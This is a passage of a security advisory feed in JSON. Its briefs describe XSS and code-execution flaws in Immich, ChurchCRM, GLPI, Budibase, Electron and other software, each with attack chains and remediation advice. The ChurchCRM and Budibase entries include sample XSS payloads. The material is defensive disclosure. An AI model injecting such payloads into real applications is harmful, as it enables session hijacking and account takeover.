defacing the site or spreading malware. 
The impact of this vulnerability is limited by the need for user interaction (clicking a malicious link), but the potential for widespread exploitation remains significant for sites using the vulnerable Cerato theme.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Zootemplate Cerato WordPress theme to a version beyond 2.2.18 to remediate CVE-2025-58920.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect exploitation attempts against this vulnerability (see the \u0026ldquo;Reflected XSS Attempt via GET\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to detect and block common XSS payloads to mitigate this and similar vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T14:16:25Z","date_published":"2026-04-10T14:16:25Z","id":"/briefs/2024-01-cerato-xss/","summary":"A reflected cross-site scripting (XSS) vulnerability exists in the Zootemplate Cerato WordPress theme (versions n/a through 2.2.18) due to improper neutralization of user-supplied input, potentially allowing attackers to execute arbitrary JavaScript in a user's browser.","title":"Zootemplate Cerato Theme Reflected XSS Vulnerability (CVE-2025-58920)","url":"https://feed.craftedsignal.io/briefs/2024-01-cerato-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["zammad","vulnerability","code execution","xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eZammad, a web-based open-source helpdesk and customer support system, is susceptible to multiple vulnerabilities. A remote, unauthenticated attacker may exploit these flaws to achieve arbitrary code execution, bypass security restrictions, conduct information disclosure, and launch cross-site scripting (XSS) attacks against users of the application. 
Successful exploitation of these vulnerabilities poses a significant risk to the confidentiality, integrity, and availability of the Zammad instance and its underlying data. This can lead to data breaches, unauthorized access, and disruption of critical customer support services. Defenders should prioritize patching and implementing mitigations to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Zammad instance accessible over the network.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability that allows bypassing authentication or authorization controls.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a code execution vulnerability to inject and execute malicious code on the Zammad server.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the executed code to gain a persistent foothold on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits an information disclosure vulnerability to retrieve sensitive data, such as database credentials or API keys.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access other internal resources or escalate privileges within the Zammad application.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into the Zammad application via a Cross-Site Scripting (XSS) vulnerability.\u003c/li\u003e\n\u003cli\u003eWhen other users interact with the injected code, the attacker can steal session cookies or perform actions on their behalf, potentially leading to full account compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the vulnerabilities in Zammad can lead to complete compromise of the helpdesk system and the exposure of sensitive customer data. 
Depending on the organization, this could affect thousands of customers and result in significant financial and reputational damage. Sectors relying heavily on customer support, such as technology, retail, and finance, are particularly at risk. An attacker could also leverage a compromised Zammad instance to launch further attacks against internal systems or customers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for unusual activity and potential exploitation attempts targeting the Zammad application.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect potential exploitation of code execution vulnerabilities via web requests.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) rule to filter out malicious requests attempting to exploit known Zammad vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T08:09:17Z","date_published":"2026-04-09T08:09:17Z","id":"/briefs/2026-04-zammad-vulns/","summary":"Multiple vulnerabilities in Zammad allow a remote attacker to execute arbitrary code, bypass security measures, disclose sensitive information, and perform cross-site scripting attacks.","title":"Multiple Vulnerabilities in Zammad","url":"https://feed.craftedsignal.io/briefs/2026-04-zammad-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-35455"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["immich","xss","cve-2026-35455","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eImmich, a self-hosted photo and video management solution, is vulnerable to a stored Cross-Site Scripting (XSS) attack. Specifically, versions prior to 2.7.0 are susceptible. An authenticated attacker can exploit the 360° panorama viewer by uploading a specially crafted equirectangular image that contains malicious text. 
When another user views the panorama with the OCR overlay enabled, the injected text is extracted via OCR and rendered by the panorama viewer without sanitization. This leads to arbitrary JavaScript execution within the victim\u0026rsquo;s browser. The vulnerability, identified as CVE-2026-35455, poses a significant risk, potentially leading to session hijacking (via persistent API key creation), private photo exfiltration, and unauthorized access to sensitive data like GPS location history and face biometric data. Users are advised to upgrade to version 2.7.0 or later to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to an Immich instance with a valid user account.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts an equirectangular image containing malicious JavaScript code embedded within the text.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the crafted image to the Immich server through the web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker shares or otherwise causes another user to view the uploaded panorama image.\u003c/li\u003e\n\u003cli\u003eThe victim views the panorama image with the OCR overlay feature enabled.\u003c/li\u003e\n\u003cli\u003eThe Immich server processes the image, and the OCR engine extracts the malicious JavaScript from the image.\u003c/li\u003e\n\u003cli\u003eThe panorama viewer renders the OCR output via \u003ccode\u003einnerHTML\u003c/code\u003e without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript executes within the victim\u0026rsquo;s browser session, allowing the attacker to perform actions such as session hijacking, data exfiltration, or unauthorized data access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability (CVE-2026-35455) in Immich can lead to severe consequences. 
An attacker can hijack user sessions by creating persistent API keys, allowing them to impersonate the victim. Furthermore, they can exfiltrate private photos and gain unauthorized access to sensitive information such as GPS location history and face biometric data stored within the Immich instance. The number of potential victims corresponds to the number of users on a vulnerable Immich instance. Given the self-hosted nature of Immich, the impact is largely dependent on the type and sensitivity of data stored within affected deployments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Immich to version 2.7.0 or later to patch the CVE-2026-35455 vulnerability.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for user-uploaded content, particularly images, to prevent XSS attacks. Focus on \u003ccode\u003ewebserver\u003c/code\u003e logs for unusual POST requests.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Immich Panorama Requests\u003c/code\u003e to identify potential exploitation attempts based on unusual URL parameters indicative of crafted panorama requests.\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003ewebserver\u003c/code\u003e logs for HTTP requests containing suspicious JavaScript payloads within the URL, which may indicate XSS attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T19:25:24Z","date_published":"2026-04-08T19:25:24Z","id":"/briefs/2024-01-immich-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in Immich versions before 2.7.0 allows authenticated users to inject arbitrary JavaScript via crafted equirectangular images, leading to session hijacking, data exfiltration, and unauthorized access.","title":"Immich Stored XSS Vulnerability in 360° Panorama Viewer 
(CVE-2026-35455)","url":"https://feed.craftedsignal.io/briefs/2024-01-immich-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.6,"id":"CVE-2026-5301"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","cve-2026-5301","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCoolerControl/coolercontrol-ui versions prior to 4.0.0 are vulnerable to a stored Cross-Site Scripting (XSS) vulnerability identified as CVE-2026-5301. This flaw resides in the log viewer component of the application. Unauthenticated attackers can exploit this vulnerability by injecting malicious JavaScript code into log entries. When a user views the log entries containing the malicious script, the script executes within their browser, potentially allowing the attacker to take over the CoolerControl service. The vulnerability was reported by GitLab Inc. and affects versions prior to the release of version 4.0.0. This is a high severity vulnerability because it allows unauthenticated attackers to perform actions as other users in the application.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a CoolerControl/coolercontrol-ui instance running a version prior to 4.0.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious log entry containing JavaScript code designed to execute arbitrary actions within a user\u0026rsquo;s session, such as stealing cookies or redirecting to a phishing site.\u003c/li\u003e\n\u003cli\u003eThe attacker injects this malicious log entry into the CoolerControl/coolercontrol-ui system. 
The method of injection is not specified in the source but could involve exploiting other vulnerabilities or misconfigurations in the system.\u003c/li\u003e\n\u003cli\u003eA user, such as an administrator, accesses the log viewer within the CoolerControl/coolercontrol-ui interface.\u003c/li\u003e\n\u003cli\u003eThe log viewer renders the malicious log entry, causing the injected JavaScript code to execute in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the user\u0026rsquo;s session or performs other malicious actions, such as stealing credentials or injecting further malicious content into the application.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised session to potentially escalate privileges and gain complete control over the CoolerControl service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5301 can lead to a complete compromise of the CoolerControl service. An attacker could gain unauthorized access to sensitive data, modify system configurations, or use the compromised system as a launchpad for further attacks. 
Given the nature of XSS vulnerabilities, impact is highly dependent on the privileges of the user whose session is compromised.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade CoolerControl/coolercontrol-ui to version 4.0.0 or later to remediate CVE-2026-5301.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding on all log entries to prevent the injection of malicious scripts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect potential exploitation attempts by monitoring for script execution in the context of the CoolerControl/coolercontrol-ui web application.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T13:16:43Z","date_published":"2026-04-08T13:16:43Z","id":"/briefs/2026-04-coolercontrol-xss/","summary":"Unauthenticated attackers can perform a stored XSS attack against CoolerControl/coolercontrol-ui versions less than 4.0.0 by injecting malicious JavaScript into log entries, leading to potential service takeover.","title":"CoolerControl-UI Stored XSS Vulnerability (CVE-2026-5301)","url":"https://feed.craftedsignal.io/briefs/2026-04-coolercontrol-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":5.4,"id":"CVE-2023-38766"},{"cvss":8.7,"id":"CVE-2026-35576"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","web-application","churchcrm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eChurchCRM, an open-source church management system, is vulnerable to a stored cross-site scripting (XSS) attack affecting versions prior to 7.0.0. This vulnerability resides within the Person Property Management subsystem and stems from insufficient input sanitization when handling dynamically assigned person properties. An authenticated attacker can inject malicious JavaScript code, which is then persistently stored in the database. 
When other users view the compromised person\u0026rsquo;s profile or access the printable view of that profile, the injected script executes, potentially leading to session hijacking or complete account takeover. This issue impacts versions patched for CVE-2023-38766, highlighting a persistent weakness. Organizations using vulnerable versions of ChurchCRM are at risk of unauthorized access and data breaches. Users are advised to update to version 7.0.0 or later to remediate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to ChurchCRM with valid user credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Person Property Management section.\u003c/li\u003e\n\u003cli\u003eAttacker creates or modifies a dynamically assigned person property, injecting malicious JavaScript code into a property field. Example payload: \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe application stores the malicious payload in the database without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA different user views the profile of the person with the compromised property.\u003c/li\u003e\n\u003cli\u003eThe stored XSS payload is rendered within the user\u0026rsquo;s browser, executing the injected JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript code steals the user\u0026rsquo;s session cookie or redirects the user to a phishing page.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to hijack the user\u0026rsquo;s session and gain unauthorized access to the application, potentially escalating privileges and accessing sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability can lead to session hijacking 
and full account compromise. Attackers could gain unauthorized access to sensitive church member data, modify records, or perform administrative functions within the ChurchCRM system. The impact ranges from data theft and privacy breaches to complete disruption of church management operations. Given the potential for widespread access to sensitive personal information, organizations are strongly advised to apply the necessary updates to mitigate this risk. The CVSS v3.1 base score for this vulnerability is 8.7, indicating a high severity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade ChurchCRM to version 7.0.0 or later to patch the vulnerability (CVE-2026-35576).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect potential XSS attempts via crafted property values.\u003c/li\u003e\n\u003cli\u003eReview and audit existing dynamically assigned person properties for suspicious script tags to identify potentially compromised records.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding to prevent future XSS vulnerabilities in ChurchCRM.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:00:00Z","date_published":"2026-04-08T12:00:00Z","id":"/briefs/2026-04-churchcrm-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in ChurchCRM versions prior to 7.0.0 allows authenticated users to inject arbitrary JavaScript code via dynamically assigned person properties, leading to potential session hijacking or account compromise when other users view the affected profile.","title":"ChurchCRM Stored XSS Vulnerability in Person Property 
Management","url":"https://feed.craftedsignal.io/briefs/2026-04-churchcrm-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-25932"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","glpi","cve-2026-25932"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-25932 is a stored cross-site scripting (XSS) vulnerability affecting GLPI, a free asset and IT management software package. The vulnerability exists in versions 0.60 up to, but not including, 10.0.24. An authenticated technician user, with the necessary privileges, can inject a malicious XSS payload into the supplier fields within the GLPI application. This payload is then stored in the database and executed when other users with access to the affected supplier data view the information. This can lead to session hijacking, defacement of the GLPI interface, or other malicious actions performed in the context of the victim user. Successful exploitation requires a valid technician account and user interaction. 
The vulnerability is patched in GLPI version 10.0.24.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to GLPI as a technician user with sufficient privileges.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the supplier management section of the GLPI interface.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a supplier field vulnerable to XSS (e.g., name, address, contact).\u003c/li\u003e\n\u003cli\u003eAttacker injects a malicious JavaScript payload into the chosen supplier field.\u003c/li\u003e\n\u003cli\u003eThe malicious payload is stored in the GLPI database.\u003c/li\u003e\n\u003cli\u003eA different user (e.g., administrator or another technician) accesses the supplier record containing the XSS payload through the GLPI web interface.\u003c/li\u003e\n\u003cli\u003eThe GLPI application retrieves the supplier data from the database and renders it in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript code is executed within the context of the victim user\u0026rsquo;s browser, enabling the attacker to perform actions such as stealing cookies, redirecting the user, or modifying data within GLPI.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-25932 can allow an attacker to execute arbitrary JavaScript code within the context of other GLPI users\u0026rsquo; browsers. This can result in session hijacking, where the attacker gains unauthorized access to the victim\u0026rsquo;s GLPI account. The attacker may also be able to deface the GLPI interface or modify data within the application. The CVSS v3.1 score of 7.2 indicates a high potential impact. 
While the precise number of vulnerable installations is unknown, any organization using GLPI versions 0.60 to 10.0.23 is potentially affected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade GLPI to version 10.0.24 or later to patch CVE-2026-25932.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect GLPI Suspicious HTTP Referer\u0026rdquo; to identify potential exploitation attempts targeting GLPI.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and output encoding measures to prevent XSS vulnerabilities in GLPI.\u003c/li\u003e\n\u003cli\u003eReview GLPI user permissions and roles to minimize the impact of potential XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to GLPI, such as unusual requests or error messages.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T15:17:06Z","date_published":"2026-04-06T15:17:06Z","id":"/briefs/2026-04-glpi-xss/","summary":"CVE-2026-25932 is a cross-site scripting vulnerability in GLPI versions 0.60 to before 10.0.24, where an authenticated technician user can store a malicious XSS payload within supplier fields, potentially leading to arbitrary code execution in the context of other users' browsers.","title":"GLPI Cross-Site Scripting Vulnerability (CVE-2026-25932)","url":"https://feed.craftedsignal.io/briefs/2026-04-glpi-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5425"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","cve-2026-5425","plugin"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Widgets for Social Photo Feed plugin for WordPress, versions up to and including 1.7.9, contains a stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-5425). 
This vulnerability stems from insufficient input sanitization and output escaping of the \u0026lsquo;feed_data\u0026rsquo; parameter keys. An unauthenticated attacker can exploit this flaw by injecting malicious JavaScript code into the WordPress database. When a user visits a page containing a vulnerable widget, the injected script executes within their browser, potentially leading to session hijacking, account takeover, or other malicious activities. This vulnerability was reported by Wordfence and patched in version 1.8 of the plugin.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe unauthenticated attacker identifies a WordPress site using a vulnerable version (\u0026lt;= 1.7.9) of the Widgets for Social Photo Feed plugin.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the plugin\u0026rsquo;s functionality that handles the \u003ccode\u003efeed_data\u003c/code\u003e parameter. This request contains an XSS payload within the parameter keys.\u003c/li\u003e\n\u003cli\u003eThe WordPress server receives the crafted HTTP request. The vulnerable plugin processes the request without proper input sanitization or output escaping.\u003c/li\u003e\n\u003cli\u003eThe malicious XSS payload is stored in the WordPress database, associated with the plugin\u0026rsquo;s settings or data.\u003c/li\u003e\n\u003cli\u003eA legitimate user visits a page on the WordPress site where the affected widget is displayed.\u003c/li\u003e\n\u003cli\u003eThe WordPress server retrieves the plugin data, including the stored XSS payload, from the database.\u003c/li\u003e\n\u003cli\u003eThe server renders the page with the unsanitized XSS payload embedded within the HTML output.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser receives the HTML page containing the malicious script and executes it. 
This could lead to redirection, information theft, or further compromise of the user\u0026rsquo;s session.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of a website user\u0026rsquo;s browser. This can result in session hijacking, defacement of the website, redirection to malicious sites, or the theft of sensitive information. While the exact number of vulnerable installations is not available, the widespread use of WordPress plugins makes this a potentially significant threat, particularly for sites that do not promptly apply security updates.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Widgets for Social Photo Feed plugin to version 1.8 or later to patch CVE-2026-5425.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect WordPress Social Photo Feed XSS Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) rule to filter out requests containing potentially malicious JavaScript code in the \u003ccode\u003efeed_data\u003c/code\u003e parameter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T09:16:20Z","date_published":"2026-04-04T09:16:20Z","id":"/briefs/2026-04-wordpress-xss/","summary":"The Widgets for Social Photo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'feed_data' parameter, allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute when a user accesses the injected page.","title":"WordPress Widgets for Social Photo Feed Plugin Stored XSS 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-wordpress-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.3,"id":"CVE-2026-34780"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["electron","context-isolation","javascript","xss","CVE-2026-34780","defense-evasion","privilege-escalation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eElectron, a framework for building cross-platform desktop applications using web technologies, is vulnerable to a context isolation bypass (CVE-2026-34780) when handling VideoFrame objects. This vulnerability affects Electron versions 39.0.0-alpha.1 to before 39.8.0, 40.0.0-alpha.1 to before 40.7.0, and 41.0.0-alpha.1 to before 41.0.0-beta.8. Specifically, applications are at risk if they utilize \u003ccode\u003econtextBridge.exposeInMainWorld()\u003c/code\u003e to pass a VideoFrame object from a preload script to the main world. An attacker who achieves JavaScript execution in the main world, for example, through a cross-site scripting (XSS) vulnerability, can leverage a bridged VideoFrame to bypass context isolation and gain access to the isolated world, including Node.js APIs exposed to the preload script. This access enables further malicious activities, potentially leading to arbitrary code execution on the host system. Patches are available in versions 39.8.0, 40.7.0, and 41.0.0-beta.8.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies an Electron application using a vulnerable version of Electron (39.0.0-alpha.1 to 39.7.x, 40.0.0-alpha.1 to 40.6.x, or 41.0.0-alpha.1 to 41.0.0-beta.7) that also uses \u003ccode\u003econtextBridge.exposeInMainWorld()\u003c/code\u003e to expose a \u003ccode\u003eVideoFrame\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into the application\u0026rsquo;s main world. 
This can be achieved through various means, such as exploiting a cross-site scripting (XSS) vulnerability.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code interacts with the bridged \u003ccode\u003eVideoFrame\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eVideoFrame\u003c/code\u003e object, due to the vulnerability, allows the attacker to bypass context isolation and gain access to the isolated world.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the access to the isolated world to access Node.js APIs that are exposed to the preload script.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the exposed Node.js APIs to perform malicious actions, such as reading sensitive data, modifying application settings, or executing arbitrary code on the host system.\u003c/li\u003e\n\u003cli\u003eThe attacker may escalate privileges by exploiting further vulnerabilities or misconfigurations within the application or the underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe final objective is to achieve arbitrary code execution on the host system, allowing the attacker to perform any desired actions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-34780) allows an attacker to bypass context isolation in affected Electron applications, potentially leading to arbitrary code execution. The number of victims depends on the popularity and security posture of Electron applications that bridge VideoFrame objects. If the attack succeeds, an attacker could steal sensitive data, install malware, or completely compromise the user\u0026rsquo;s system. 
Sectors heavily reliant on Electron-based desktop applications, such as communication, development, and productivity tools, are at higher risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Electron applications to patched versions (39.8.0, 40.7.0, or 41.0.0-beta.8) to address CVE-2026-34780.\u003c/li\u003e\n\u003cli\u003eReview and sanitize all user-supplied input to prevent XSS vulnerabilities that can be leveraged to exploit CVE-2026-34780.\u003c/li\u003e\n\u003cli\u003eImplement strict Content Security Policy (CSP) to mitigate the risk of XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor application logs for suspicious JavaScript execution, especially related to \u003ccode\u003eVideoFrame\u003c/code\u003e objects and \u003ccode\u003econtextBridge.exposeInMainWorld()\u003c/code\u003e, to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule for suspicious process execution via Node.js APIs to detect malicious behavior following a successful context isolation bypass.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T01:16:39Z","date_published":"2026-04-04T01:16:39Z","id":"/briefs/2026-04-electron-videoframes/","summary":"A context isolation bypass vulnerability exists in Electron applications that bridge VideoFrame objects via contextBridge, potentially allowing an attacker with JavaScript execution in the main world to access the isolated world and Node.js APIs.","title":"Electron VideoFrame Context Isolation Bypass Vulnerability (CVE-2026-34780)","url":"https://feed.craftedsignal.io/briefs/2026-04-electron-videoframes/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2026-35218"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["budibase","xss","cve-2026-35218","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eBudibase, an open-source low-code platform, is vulnerable 
to a stored cross-site scripting (XSS) attack. Prior to version 3.32.5, the Builder Command Palette renders entity names (tables, views, queries, automations) unsanitized, using Svelte\u0026rsquo;s {@html} directive. This allows an attacker with Builder access to inject arbitrary HTML into the names of database tables, views, queries, or automations. When a Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the injected HTML payload is executed within their browser context. This execution can be leveraged to steal session cookies, leading to full account takeover. The vulnerability, identified as CVE-2026-35218, was patched in Budibase version 3.32.5. Defenders should prioritize upgrading to the patched version.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to a Budibase instance with Builder access.\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a database table.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a malicious HTML payload (e.g., \u003ccode\u003e\u0026lt;img src=x onerror=alert(document.domain)\u0026gt;\u003c/code\u003e) into the table name via the Budibase Builder interface.\u003c/li\u003e\n\u003cli\u003eThe attacker saves the modified table.\u003c/li\u003e\n\u003cli\u003eAnother authenticated user with Builder access in the same workspace opens the Command Palette (Ctrl+K).\u003c/li\u003e\n\u003cli\u003eThe Command Palette renders the table name containing the malicious HTML.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the injected HTML, triggering the onerror event and executing JavaScript.\u003c/li\u003e\n\u003cli\u003eThe JavaScript steals the user\u0026rsquo;s session cookie and sends it to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to impersonate the victim user and gain full account 
access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to the theft of sensitive user session cookies, allowing an attacker to impersonate legitimate users with Builder access. This can result in unauthorized modification of Budibase applications, exfiltration of sensitive data stored within Budibase, and further compromise of systems integrated with Budibase. The severity is high due to the ease of exploitation for authenticated users and the potential for complete account takeover.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.32.5 or later to remediate CVE-2026-35218.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eBudibase_Suspicious_Command_Palette_HTML\u003c/code\u003e to detect potential exploitation attempts by monitoring HTTP activity related to the Command Palette.\u003c/li\u003e\n\u003cli\u003eEnable webserver logging to collect the data required by the Sigma rule \u003ccode\u003eBudibase_Suspicious_Command_Palette_HTML\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T16:16:41Z","date_published":"2026-04-03T16:16:41Z","id":"/briefs/2026-04-budibase-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in Budibase versions prior to 3.32.5 allows authenticated users with Builder access to inject malicious HTML payloads into entity names, leading to potential session cookie theft and account takeover when other Builder users open the Command 